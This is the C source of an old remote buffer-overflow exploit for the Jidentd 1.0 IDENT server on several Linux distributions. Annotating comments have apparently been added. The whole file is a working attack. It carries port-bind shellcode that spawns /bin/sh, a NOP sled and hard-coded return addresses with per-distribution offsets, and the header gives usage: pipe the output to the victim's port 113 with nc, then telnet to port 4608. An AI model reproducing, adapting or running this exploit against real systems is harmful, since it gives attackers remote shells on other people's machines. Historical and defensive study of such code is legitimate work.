Jidentd 1.0 IDENT server remote exploit. Tested under Slackware 3.6 and 4.0, Debian 2.1, Redhat 4.1, 5.0, 5.1 and 5.2.
9bb5daf2edcaff51a09bef34d3664fe3ceeb2793878de4d7c1634fcf15c2396a
/*
* Jidentd 1.0 IDENT server remote sploit
* funkySh 03/08/99(v.2) / port-bind shellcode by tekneeq
* run: jidex [offset] | nc victim 113
* telnet victim 4608
*
* tested under:
* Slackware 3.6, 4.0 offset = 0
* Debian 2.1 offset =
* Redhat 5.1, 5.2 offset = 700
* 5.0 offset = 800
* 4.1 offset =
*
* also try modifying ALIGN if it does not work.
*/
#include <stdio.h>
/*
 * Payload bytes written into the middle of the overflow line (see main).
 * The header above describes this as port-bind shellcode (the listed
 * follow-up step is "telnet victim 4608"); the string ends with the
 * literal "/bin/sh". It is copied with strlen(), so it is expected to
 * contain no 0x00 byte — the visible escapes contain none.
 * From a detection standpoint, the repeated "junk" filler bytes and the
 * trailing "/bin/sh" arriving on the ident port are a usable signature.
 */
char code[] =
"\x31\xdb\xb0\x1b\xcd\x80\xeb\x40\x5e\x31\xc0\x40\x89\x46\x04"
"\x89\xc3\x40\x89\x06\xb0\x06\x89\x46\x08\xb0\x66\x8d\x0e\xcd"
"\x80\x89\x06\x8d\x4e\x0c\x89\x4e\x04\x31\xc0\x89\x46\x10\x89"
"\x46\x14\xb0\x02\x89\xc3\x89\x46\x0c\xb0\x12\x89\x46\x0e\xb0"
"\x10\x89\x46\x08\xb0\x66\x8d\x0e\xcd\x80\xeb\x02\xeb\x62\x31"
"\xdb\x89\xd8\xb3\x01\x89\x5e\x04\xb3\x04\x8d\x0e\xb0\x66\xcd"
"\x80\x31\xc0\x8d\x4e\x0c\x89\x4e\x04\x8d\x4e\x1c\x89\x4e\x08"
"\x8d\x0e\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc0\x89\xc1\xb0"
"\x3f\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
"\x89\xf2\x83\xc2\x20\x89\xd6\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x57\xff\xff\xff\x6a\x75\x6e"
"\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75"
"\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b/bin/sh";
/* Total size of the line sent to the server (1099 bytes plus NUL). */
#define BUFFER 1100
/* Fill byte for the sled: x86 one-byte NOP. */
#define NOP 0x90
/*
 * Hard-coded guess at the stack address the overwritten return address
 * should point into; the optional command-line offset is added to it
 * (see main). Values like this are what make the exploit distribution-
 * specific, as the header's per-distribution offset table shows.
 */
#define RET_ADDR 0xbffff704
/* Shifts the start of the repeated-address region by ALIGN bytes. */
#define ALIGN 0
/* The overflow line assembled by main and written to stdout. */
char buf[BUFFER];
/*
 * Assembles the overflow line and prints it to stdout; the header shows it
 * being piped to the ident port (113) of the target.
 *
 * Layout of buf, which is the textbook stack-smash shape and the thing a
 * defender can look for on the ident port: a NOP fill, the payload at
 * offset 700, then the candidate return address repeated every 4 bytes
 * from offset 923+ALIGN to the end of the buffer.
 *
 * argv[1], if present, is an integer offset added to RET_ADDR.
 *
 * Note: only <stdio.h> is included, so atoi, memset, memcpy and strlen
 * are used without prototypes (implicit declarations), and "void main"
 * is not a standard signature — this listing predates such compilers
 * rejecting it. Left as in the original.
 */
void main(int argc, char * argv[])
{
int i, offset = 0;
long address;
/* atoi performs no error checking; a non-numeric argument yields 0. */
if(argc > 1) offset = atoi(argv[1]);
address = RET_ADDR + offset;
/* Fill the whole buffer with NOP bytes first. */
memset(buf,NOP,BUFFER);
/* Place the payload at offset 700; strlen stops at the first 0x00 byte. */
memcpy(buf+700,code,strlen(code));
/*
 * Overwrite the tail of the buffer with the guessed address as 4-byte
 * stores. The cast writes a (possibly unaligned) int at each step; on
 * the 32-bit x86 targets listed in the header this is tolerated.
 */
for(i=923+ALIGN;i<BUFFER-2;i+=4)
*(int *)&buf[i]=address;
/* NUL-terminate so printf emits exactly BUFFER-1 bytes. */
buf[BUFFER - 1] = 0;
printf("%s", buf);
}